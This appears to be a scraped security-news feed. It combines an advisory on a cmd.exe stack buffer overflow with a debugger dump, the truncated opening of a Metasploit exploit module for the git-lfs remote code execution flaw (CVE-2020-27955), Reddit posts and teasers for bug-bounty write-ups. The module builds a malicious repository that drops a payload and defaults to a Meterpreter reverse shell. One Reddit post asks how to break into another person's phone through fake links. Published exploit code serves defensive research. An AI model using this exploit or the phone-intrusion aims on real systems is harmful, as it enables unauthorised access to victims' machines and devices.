Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Microsoft Windows cmd.exe Stack Buffer Overflow
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Microsoft Windows cmd.exe suffers from a stack buffer overflow vulnerability.
MD5 |
Download
Microsoft Windows cmd.exe Stack Buffer Overflow
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Microsoft Windows cmd.exe suffers from a stack buffer overflow vulnerability.
MD5 |
4135a0b3c0d59c65ab1f2e814a5b7aeeDownload
[+] Credits: John Page (aka hyp3rlinx, malvuln)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.
[Vulnerability Type]
Stack Buffer Overflow
[CVE Reference]
N/A
[Security Issue]
Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.
E.g. cmd.exe /c <payload.
[Memory Dump]
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret
0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000008
PROCESS_NAME: cmd.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - [...]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Git git-lfs Remote Code Execution
https://3.bp.blogspot.com/-A9um4FlUYrw/WWlvH0fnNDI/AAAAAAAAILk/pA4dWsQKlcwBJHJ-2O0qL7e98i6zrXCWwCLcBGAs/s1600/h141.png
This Metasploit modules exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.
MD5 |
Download
Git git-lfs Remote Code Execution
https://3.bp.blogspot.com/-A9um4FlUYrw/WWlvH0fnNDI/AAAAAAAAILk/pA4dWsQKlcwBJHJ-2O0qL7e98i6zrXCWwCLcBGAs/s1600/h141.png
This Metasploit modules exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.
MD5 |
15523ed242b4fcf0e41eea300eaeb7ceDownload
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Git
include Msf::Exploit::Git::Lfs
include Msf::Exploit::Git::SmartHttp
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',
'Description' => %q{
A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for
versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked
into cloning the attacker’s malicious repository using a vulnerable Git version control tool
},
'Author' => [
'Dawid Golunski ', # Discovery
'space-r7', # Guidance, git mixins
'jheysel-r7' # Metasploit module
],
'References' => [
['CVE', '2020-27955'],
['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']
],
'DisclosureDate' => '2020-11-04', # Public disclosure
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Git LFS <=
{
'Platform' => ['win']
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 10
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
ARTIFACTS_ON_DISK
]
}
)
)
register_options([
OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
])
deregister_options('RHOSTS')
end
def setup_repo_structure
payload_fname = 'git.exe'
@hook_payload = generate_payload_exe
ptr_file = generate_pointer_file(@hook_payload)
git_payload_ptr = GitObject.build_blob_object(ptr_file)
git_attr_fname = '.gitattributes'
git_attr_content = "#{payload_fname[...]Hello ppl ! This is Gnana Aravind, with a new write-up on how i got my first Hall of Fame. So first of all a HOF is something like an…Continue reading on Medium » (https://aravind07.medium.com/my-first-hall-of-fame-d575cb919801?source=rss------bug_bounty-5)
hacking: security in practice
Why is kali so hated?
My best guess is because it’s the first thing everyone get instead of looking at the other options and skiddies think they are professional hacker after downloading it. Is this the reason or is there a different reason?
Apart from that I don’t understand why it’s so hated especially since it is a great distro for both experts and beginners alike.
submitted by /u/theUnholyVenom
[link] [comments]
Why is kali so hated?
My best guess is because it’s the first thing everyone get instead of looking at the other options and skiddies think they are professional hacker after downloading it. Is this the reason or is there a different reason?
Apart from that I don’t understand why it’s so hated especially since it is a great distro for both experts and beginners alike.
submitted by /u/theUnholyVenom
[link] [comments]
reddit
Why is kali so hated?
My best guess is because it’s the first thing everyone get instead of looking at the other options and skiddies think they are professional hacker...
hacking: security in practice
Is it hard to get into someone's phone through a video or link
I'm starting to get into this stuff and I'd like to know where to learn about getting into someone's phone through video or links. Is there a course or something to learn this stuff?
All I want to know is:- 1-creating fake links. 2-how to get into person's phone(have access to everything like it's my own) through the link or just a video.
Help a newbie, y'all have been in my place once before. Thanks in advance
submitted by /u/VoileGrace25
[link] [comments]
Is it hard to get into someone's phone through a video or link
I'm starting to get into this stuff and I'd like to know where to learn about getting into someone's phone through video or links. Is there a course or something to learn this stuff?
All I want to know is:- 1-creating fake links. 2-how to get into person's phone(have access to everything like it's my own) through the link or just a video.
Help a newbie, y'all have been in my place once before. Thanks in advance
submitted by /u/VoileGrace25
[link] [comments]
reddit
Is it hard to get into someone's phone through a video or link
I'm starting to get into this stuff and I'd like to know where to learn about getting into someone's phone through video or links. Is there a...
Bounty Hacker Tryhackme Walkthrough
Hello guys and welcome back , Ayush this side, today we’ll talk about one of the tryhackme room “Bounty Hacker”, it’s a quite easy room in…Continue reading on InfoSec Write-ups »
Read more...
Hello guys and welcome back , Ayush this side, today we’ll talk about one of the tryhackme room “Bounty Hacker”, it’s a quite easy room in…Continue reading on InfoSec Write-ups »
Read more...
Bounty Hacker Tryhackme Walkthrough
https://infosecwriteups.com/bounty-hacker-tryhackme-walkthrough-8f8e0c65827d?source=rss------bug_bounty-5
https://infosecwriteups.com/bounty-hacker-tryhackme-walkthrough-8f8e0c65827d?source=rss------bug_bounty-5
Hello guys and welcome back , Ayush this side, today we’ll talk about one of the tryhackme room “Bounty Hacker”, it’s a quite easy room in…Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/bounty-hacker-tryhackme-walkthrough-8f8e0c65827d?source=rss------bug_bounty-5)
Nimbus Bug Bounty Program #2
https://nimbusplatform.medium.com/nimbus-bug-bounty-program-2-8a91eda03e72?source=rss------bug_bounty-5
https://nimbusplatform.medium.com/nimbus-bug-bounty-program-2-8a91eda03e72?source=rss------bug_bounty-5
We are happy to announce the #2 edition of our Bug Bounty Program on Hacken Platform.Continue reading on Medium » (https://nimbusplatform.medium.com/nimbus-bug-bounty-program-2-8a91eda03e72?source=rss------bug_bounty-5)
Attacking Active Directory as a Red Teamer or as an attacker
https://www.reddit.com/r/redteamsec/comments/ppippu/attacking_active_directory_as_a_red_teamer_or_as/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/AttackingAD) [comments] (https://www.reddit.com/r/redteamsec/comments/ppippu/attacking_active_directory_as_a_red_teamer_or_as/)
https://www.reddit.com/r/redteamsec/comments/ppippu/attacking_active_directory_as_a_red_teamer_or_as/
submitted by /u/SCI_Rusher (https://www.reddit.com/user/SCI_Rusher)
[link] (https://aka.ms/AttackingAD) [comments] (https://www.reddit.com/r/redteamsec/comments/ppippu/attacking_active_directory_as_a_red_teamer_or_as/)